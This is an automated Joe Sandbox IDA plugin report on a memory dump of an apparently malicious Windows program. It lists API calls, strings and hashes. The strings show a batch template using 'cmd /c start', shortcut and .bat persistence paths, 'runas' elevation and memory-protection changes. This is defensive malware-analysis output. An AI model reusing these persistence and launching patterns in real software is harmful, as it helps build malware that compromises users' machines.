                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset$lstrlen
                          • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                          • API String ID: 4132764700-2457321626
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • __snwprintf.LIBCMT ref: 004155A7
                          • _memset.LIBCMT ref: 004156DF
                          • __snwprintf.LIBCMT ref: 004156FD
                          Similarity
                          • API ID: InfoLocale___crt__snwprintf$_memset
                          • String ID: $!$"$#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s
                          • API String ID: 2690796221-3769927825
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • _memmove.LIBCMT ref: 00418A88
                          • lstrlenW.KERNEL32(?), ref: 00418AAC
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00418ABF
                          Similarity
                          • API ID: lstrlen$AllocLocal_memmove
                          • String ID: PdC$PdC$PdC
                          • API String ID: 39496755-1398650270
                          APIs
                          • lstrlenW.KERNEL32(00473F0C), ref: 004179EE
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417A00
                          • CreateThread.KERNEL32(00000000,00000000,00408670,00000000,00000000,00000000), ref: 00417A23
                          • LocalFree.KERNEL32(?), ref: 00417A41
                          • _memset.LIBCMT ref: 00417ABA
                          • __snwprintf.LIBCMT ref: 00417ADF
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417B64
                          • CreateThread.KERNEL32(00000000,00000000,0040BCA0,00000000,00000000,00000000), ref: 00417B87
                          • CloseHandle.KERNEL32(?), ref: 00417BA4
                          • CreateThread.KERNEL32(00000000,00000000,0041C690,00000000,00000000,00000000), ref: 00417BD5
                          • CreateThread.KERNEL32(00000000,00000000,00422100,00000000,00000000,00000000), ref: 00417BEF
                          Similarity
                          • API ID: Create$Thread$Event$CloseFreeHandleLocal__snwprintf_memsetlstrlen
                          • String ID: "%s%s"
                          • API String ID: 4079218935-1694057794
                          APIs
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417C3C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417C54
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417C6A
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417C7F
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417C97
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417CAD
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417CC2
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417CD8
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417CF0
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D05
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417D1B
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417D33
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D48
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D5E
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          APIs
                          • __snwprintf.LIBCMT ref: 0040EE72
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snprintf.LIBCMT ref: 0040EECE
                          • __snwprintf.LIBCMT ref: 0040EF25
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040EF33
                          • __snwprintf.LIBCMT ref: 0040EF89
                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EFAB
                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 0040EFD7
                          Similarity
                          • API ID: __snwprintf$lstrlen$CreateFile$DirectoryWrite__snprintf
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S
                          • API String ID: 2767719528-1386577
                          Similarity
                          • API ID: lstrlen$AllocLocal_memmove
                          • String ID: xC@
                          • API String ID: 39496755-137084332
                          APIs
                          • LocalAlloc.KERNEL32(00000040,-00000001,?,0041C941,00000000,00000000,0047FD50,0047FDF8), ref: 0041CA0F
                          • _memmove.LIBCMT ref: 0041CA2E
                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0041C941,00000000,00000000), ref: 0041CA54
                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0041C941,00000000), ref: 0041CA9A
                          Similarity
                          • API ID: Local$Free$Alloc_memmove
                          • String ID:
                          • API String ID: 3668202806-0
                          Similarity
                          • API ID: __snwprintf_memsetlstrcpy
                          • String ID: .DLL$SOFTWARE\%s
                          • API String ID: 521008980-3069316046
                          Similarity
                          • API ID:
                          • String ID: <$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$application/octet-stream$text/plain
                          • API String ID: 0-1210979922
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,?,0041824B,?), ref: 0041852B
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418563
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418583
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0041824B,?), ref: 0041859B
                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 004185BA
                          • ResumeThread.KERNEL32(00000000), ref: 004185E8
                          • CloseHandle.KERNEL32(00000000), ref: 004185FE
                          • CloseHandle.KERNEL32(00000000), ref: 00418608
                          Similarity
                          • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 144976343-2564639436
                          Similarity
                          • API ID: __snwprintf$DeleteFile$DirectoryRemove
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT
                          • API String ID: 2831937974-377014195
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041BD48
                          • _memset.LIBCMT ref: 0041BD5B
                          • RegisterClassW.USER32(?), ref: 0041BD7E
                          • GetLastError.KERNEL32 ref: 0041BD90
                          • CreateWindowExW.USER32(00000000,0047B6BA,004392B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0041BDC4
                          • GetMessageW.USER32(?,?,00000000,00000000), ref: 0041BDE7
                          • TranslateMessage.USER32(?), ref: 0041BDF5
                          • DispatchMessageW.USER32(?), ref: 0041BDFF
                          • DestroyWindow.USER32(?), ref: 0041BE0D
                          • UnregisterClassW.USER32(0047B6BA,?), ref: 0041BE25
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                          • String ID:
                          • API String ID: 1736019982-0
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040C653
                          • wsprintfW.USER32 ref: 0040C69F
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040C6CA
                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0040C721
                          Similarity
                          • API ID: lstrlen$CreateFile$DirectoryModuleName__snwprintfwsprintf
                          • String ID: %s%s$P
                          • API String ID: 1009040823-50959982
                          Similarity
                          • API ID: __snwprintflstrlen$_memmove_memset
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 1226727644-2868705786
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041FCE9
                          • und_memcpy.LIBCMTD ref: 0041FD0F
                          • und_memcpy.LIBCMTD ref: 0041FD2A
                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0041FD48
                          • LocalFree.KERNEL32(00000000), ref: 0041FD64
                          Similarity
                          • API ID: AllocLocalund_memcpy$FreeVirtual
                          • String ID:
                          • API String ID: 2616075706-0
                          APIs
                          • lstrcpyA.KERNEL32(0047FF48,0047C710), ref: 00422FC4
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00423006
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00423017
                          • lstrcpyA.KERNEL32(?,0047FD50), ref: 00423064
                          • ReleaseMutex.KERNEL32(?), ref: 00423079
                          • ReleaseMutex.KERNEL32(?), ref: 0042302B
                            • Part of subcall function 00423100: lstrlenW.KERNEL32(?), ref: 00423119
                          • lstrcpyA.KERNEL32(0047FF48,?), ref: 004230BF
                          Similarity
                          • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlen
                          • String ID:
                          • API String ID: 1097325810-0
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 0041D32A
                          • CreateThread.KERNEL32(00000000,00000000,0041D440,00000000,00000000,00000000), ref: 0041D371
                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0041D3CB
                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 0041D3E2
                          • CloseHandle.KERNEL32(00000000), ref: 0041D3F1
                          • LocalFree.KERNEL32(00000000), ref: 0041D3FB
                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0041D416
                          • CloseHandle.KERNEL32(00000000), ref: 0041D420
                          • LocalFree.KERNEL32(00000000), ref: 0041D42A
                          Similarity
                          • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                          • String ID:
                          • API String ID: 872497719-0
                          APIs
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040D7DD
                          Similarity
                          • API ID: FreeVirtual
                          • String ID: @$_DllMain@12
                          • API String ID: 1263568516-1064695914
                          APIs
                          • _memset.LIBCMT ref: 00406DCA
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00406E85
                          • _memmove.LIBCMT ref: 00406EAF
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00406F60
                          • _memmove.LIBCMT ref: 00406F90
                          • _memset.LIBCMT ref: 00406FE8
                          Similarity
                          • API ID: CurrentProcess_memmove_memset
                          • String ID: D
                          • API String ID: 3982101328-2746444292
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snwprintf.LIBCMT ref: 0040F4CC
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040F50F
                          • __snwprintf.LIBCMT ref: 0040F553
                          • _memset.LIBCMT ref: 0040F563
                          Similarity
                          • API ID: __snwprintflstrlen$_memsetlstrcmpi
                          • String ID: "%s%s" %s$%s%s$D
                          • API String ID: 3486848216-1142567492
                          APIs
                          • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00423628
                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00423651
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2574300362-196638859
                          • Opcode ID: 515c2e0ee8a0e5ba850e9100b05932fa9f56ab70241ada10714002074d93930a
                          • Instruction ID: 58b0ae03d4b459a716950005324cdfb3490182bae94a327c6236c0a64777fc64
                          • Opcode Fuzzy Hash: 515c2e0ee8a0e5ba850e9100b05932fa9f56ab70241ada10714002074d93930a
                          • Instruction Fuzzy Hash: 165104B4A00218EFCB14DF60D988BD9B7B5BB48301F6085A9E909A7350DB789B85DF54
                          APIs
                          • _memset.LIBCMT ref: 00417ABA
                          • __snwprintf.LIBCMT ref: 00417ADF
                            • Part of subcall function 00407280: _memset.LIBCMT ref: 004072BF
                            • Part of subcall function 00407280: _memset.LIBCMT ref: 0040730A
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417B64
                          • CreateThread.KERNEL32(00000000,00000000,0040BCA0,00000000,00000000,00000000), ref: 00417B87
                          • CloseHandle.KERNEL32(?), ref: 00417BA4
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • CreateThread.KERNEL32(00000000,00000000,0041C690,00000000,00000000,00000000), ref: 00417BD5
                          • CreateThread.KERNEL32(00000000,00000000,00422100,00000000,00000000,00000000), ref: 00417BEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$Thread_memsetlstrlen$__snwprintf$CloseEventHandle
                          • String ID: "%s%s"
                          • API String ID: 3189696634-1694057794
                          • Opcode ID: 9402a5bf2234cc531801f2ad4859e290af130b3bd0802ef8c76280a6f5f20343
                          • Instruction ID: 63a10ece418804601786ab08b0f6251961baafe1328c1c8680ebe09e9a8bf3d6
                          • Opcode Fuzzy Hash: 9402a5bf2234cc531801f2ad4859e290af130b3bd0802ef8c76280a6f5f20343
                          • Instruction Fuzzy Hash: A9416270A88314AFE724AB60AC4BFE53274A715709F10457AF20D692D1D7F869C4CF5E
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,?,0041824B,?), ref: 0041852B
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418563
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418583
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0041824B,?), ref: 0041859B
                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 004185BA
                          • ResumeThread.KERNEL32(00000000), ref: 004185E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 3200977696-2564639436
                          • Opcode ID: e47913d85177d952f07e91ab2c55a93ee882f99a65de917e450145ff4c684f91
                          • Instruction ID: fd4e0360adda180c4f1a786bb116d6f6d9cc44fc05efef3a18d3bfaac9fe992b
                          • Opcode Fuzzy Hash: e47913d85177d952f07e91ab2c55a93ee882f99a65de917e450145ff4c684f91
                          • Instruction Fuzzy Hash: F03118B4A00219EFDB14CF94C888BEEB7B2FB48304F248559E61967390C775A981CF58
                          APIs
                          • _malloc.LIBCMT ref: 004252B2
                            • Part of subcall function 004256B9: __FF_MSGBANNER.LIBCMT ref: 004256D2
                            • Part of subcall function 004256B9: __NMSG_WRITE.LIBCMT ref: 004256D9
                            • Part of subcall function 004256B9: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00405B83,?), ref: 004256FE
                          • std::exception::exception.LIBCMT ref: 004252E7
                          • std::exception::exception.LIBCMT ref: 00425301
                          • __CxxThrowException@8.LIBCMT ref: 00425312
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                          • String ID: bad allocation$e=A$8@
                          • API String ID: 615853336-2188504570
                          • Opcode ID: efa5a78bcec6c1264fe53b01ca0a315b7082a394095cb23883f6a574b7f84a8e
                          • Instruction ID: 7988b96250c015560cd3d619290e4bc3d25131546947fc9e3d0e9ea9cb753055
                          • Opcode Fuzzy Hash: efa5a78bcec6c1264fe53b01ca0a315b7082a394095cb23883f6a574b7f84a8e
                          • Instruction Fuzzy Hash: BEF0F93161052CAACB04FB56FC0679D77A8AF44728FA4446FE800E61D1CBBD8E458B6C
                          APIs
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 00408F43
                          • lstrcpyW.KERNEL32(00000000,0047B978), ref: 00408F8E
                            • Part of subcall function 00408310: GetLastError.KERNEL32 ref: 0040834C
                            • Part of subcall function 00408310: __snwprintf.LIBCMT ref: 0040838E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ErrorLast__snwprintf
                          • String ID: "%s%s" %s$%s%s$<@@$@@$D$runas
                          • API String ID: 89890705-184178886
                          • Opcode ID: 6778802388b4a04b26f3ca18ba12eaaf2ff7c927a724906eae246c19d0108b67
                          • Instruction ID: e9135c0d80ee49335ed4243af3315bff5dc05c7714a0478ed2a99f7f94b60ec1
                          • Opcode Fuzzy Hash: 6778802388b4a04b26f3ca18ba12eaaf2ff7c927a724906eae246c19d0108b67
                          • Instruction Fuzzy Hash: 8DA12DB0A00218DFEB24DF60DC49B9DB774FB48705F1085AAE60DB6291DB745A88CF69
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041F942
                          • und_memcpy.LIBCMTD ref: 0041F968
                          • und_memcpy.LIBCMTD ref: 0041F983
                          • und_memcpy.LIBCMTD ref: 0041F9B7
                          • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0041FBC5
                          • LocalFree.KERNEL32(00000000), ref: 0041FC8B
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                          • String ID:
                          • API String ID: 3065580769-0
                          • Opcode ID: db97eb557d4180286acccdacbb63b56f7b53785f800bb29965c8605d456440a9
                          • Instruction ID: 60fb578c4be36f93d8985b3f4f049626573707d5ff0a196cfa10f70d59769fc2
                          • Opcode Fuzzy Hash: db97eb557d4180286acccdacbb63b56f7b53785f800bb29965c8605d456440a9
                          • Instruction Fuzzy Hash: 05A1C270A056288BDB28CF04CD95BDAB7B1BB88305F1481EAD40DAB354D7396EC6CF84
                          APIs
                          • _memmove.LIBCMT ref: 0040F28B
                          • __snwprintf.LIBCMT ref: 0040F332
                          • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 0040F34D
                          • WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 0040F36E
                          • DeleteFileW.KERNEL32(00000000), ref: 0040F3A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteWrite__snwprintf_memmove
                          • String ID: %s%s
                          • API String ID: 1135641114-3252725368
                          • Opcode ID: 40875bf7252593c87c7f63d1ba15bc5223dc12cf6d8f7c1c20e90b78a65ca814
                          • Instruction ID: e1b8e62fcb98a0169351ce3fd75097269ad8096bf713dfe403c8dd12490f9e03
                          • Opcode Fuzzy Hash: 40875bf7252593c87c7f63d1ba15bc5223dc12cf6d8f7c1c20e90b78a65ca814
                          • Instruction Fuzzy Hash: BE411B75A00209EBDB14DFA4D989FAEBBB5FF48701F104579FA05B7280C778AA44CB58
                          APIs
                          • CloseHandle.KERNEL32(00000000), ref: 004182C7
                          • CloseHandle.KERNEL32(00000000), ref: 004182E7
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004182FF
                          • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 0041831E
                          • ResumeThread.KERNEL32(00000000), ref: 0041834C
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004183A1
                          • CloseHandle.KERNEL32(00000000), ref: 004183CD
                          • CloseHandle.KERNEL32(00000000), ref: 004183ED
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00418405
                          • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 00418424
                          • ResumeThread.KERNEL32(00000000), ref: 00418452
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID: d
                          • API String ID: 738346648-2564639436
                          • Opcode ID: 2a3b5e452e677c21a53d98120e54adf304e48e22d55fefbe41f6c8e64a6de015
                          • Instruction ID: ba0be99f31122c16ebddf1e6e47dfae09c46e12a65730e933a3b4d9d22be5517
                          • Opcode Fuzzy Hash: 2a3b5e452e677c21a53d98120e54adf304e48e22d55fefbe41f6c8e64a6de015
                          • Instruction Fuzzy Hash: AF319374E00208DFDB18CF94C888B9DFBB1BF88705F24C259EA156B395CB75A886CB44
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 0041D866
                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 0041D889
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D8A0
                          • ResumeThread.KERNEL32(00000000), ref: 0041D8DE
                          • CloseHandle.KERNEL32(00000000), ref: 0041D8F2
                          • CloseHandle.KERNEL32(00000000), ref: 0041D90C
                          • LocalFree.KERNEL32(00000000), ref: 0041D916
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
                          • String ID:
                          • API String ID: 4097846125-0
                          • Opcode ID: 8231620f3605af58c0a931139f119fd4e7802a4526fdbcce2b5dab214ad60b68
                          • Instruction ID: 96f23212a6419cea9540a98e5d17cd16be6374bc9748ac4717777b420f28046f
                          • Opcode Fuzzy Hash: 8231620f3605af58c0a931139f119fd4e7802a4526fdbcce2b5dab214ad60b68
                          • Instruction Fuzzy Hash: 13215EB9E00208FBDB04DFA4D849BDDB7B4AB48311F208199FA19A7390C734AA40CF58
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0042017C
                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00420191
                          • LocalAlloc.KERNEL32(00000040,000000FF), ref: 004201A6
                          • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 004201C7
                          • CloseHandle.KERNEL32(000000FF), ref: 004201DD
                          • LocalFree.KERNEL32(00000000), ref: 004201F4
                          • CloseHandle.KERNEL32(000000FF), ref: 004201FE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction ID: 12de7b0313f4499c1902146f5b05111a38b60bb585a5da9353494ef4b19c3374
                          • Opcode Fuzzy Hash: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction Fuzzy Hash: 1A212774A00308FBDB14DBE4DC88BAEB7B8FB88710F108199E625A72D0C674AA40CB54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf
                          • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                          • API String ID: 2391506597-3707798339
                          • Opcode ID: ff38144e36b07f6db76263b73ea45fb743e31a8283e63518e53c945a542f6b1a
                          • Instruction ID: 8d8a976fe95106f2b20d64d823a6b75adf7ba3c6bb1cc1f2bc7a940eae9cbe5c
                          • Opcode Fuzzy Hash: ff38144e36b07f6db76263b73ea45fb743e31a8283e63518e53c945a542f6b1a
                          • Instruction Fuzzy Hash: 1E1146F1700344A7EF00DF90CC86FB73258AB85704F16452AF6165B6C0D6BDD8A1C75A
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0040C58E
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040C5B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: KERNEL32.DLL$USER32.DLL
                          • API String ID: 4146042529-2880226457
                          • Opcode ID: f9ff6b7c69088ed18e6cd30b313f6bcd22874cd683d3ae34d823f47e626d093f
                          • Instruction ID: d8326dfa3f95f6af7e2172a4f9426cee28022d40273b6685088d782de763849f
                          • Opcode Fuzzy Hash: f9ff6b7c69088ed18e6cd30b313f6bcd22874cd683d3ae34d823f47e626d093f
                          • Instruction Fuzzy Hash: 4C01A774B54218EFC720DB70CD89BEB76B49708304F2019B6E60AF21C0E279BA449E6D
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C840,00000008,00429269,00000000,00000000,?,?,004283B3,00425742,?,?,00405B83,?), ref: 00429172
                          • __lock.LIBCMT ref: 004291A6
                            • Part of subcall function 0042D7F5: __mtinitlocknum.LIBCMT ref: 0042D80B
                            • Part of subcall function 0042D7F5: __amsg_exit.LIBCMT ref: 0042D817
                            • Part of subcall function 0042D7F5: EnterCriticalSection.KERNEL32(00405B83,00405B83,?,004291AB,0000000D,?,?,004283B3,00425742,?,?,00405B83,?), ref: 0042D81F
                          • InterlockedIncrement.KERNEL32(888D8B31), ref: 004291B3
                          • __lock.LIBCMT ref: 004291C7
                          • ___addlocaleref.LIBCMT ref: 004291E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL
                          • API String ID: 637971194-2576044830
                          • Opcode ID: 9d9a3459f5f0cdfb04b3158e47f20ecdca7376571223b52a922268d22b747446
                          • Instruction ID: 6c66b634a268711a9401fe7bb6153e1dc172c36381796aa83b41a0db6993cb8d
                          • Opcode Fuzzy Hash: 9d9a3459f5f0cdfb04b3158e47f20ecdca7376571223b52a922268d22b747446
                          • Instruction Fuzzy Hash: 48018471940700EFD720AF6AE846749FBF0AF54314F60894FE4D5972A0CBBCAA44CB69
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040601B
                          • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040602D
                          • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 00406041
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
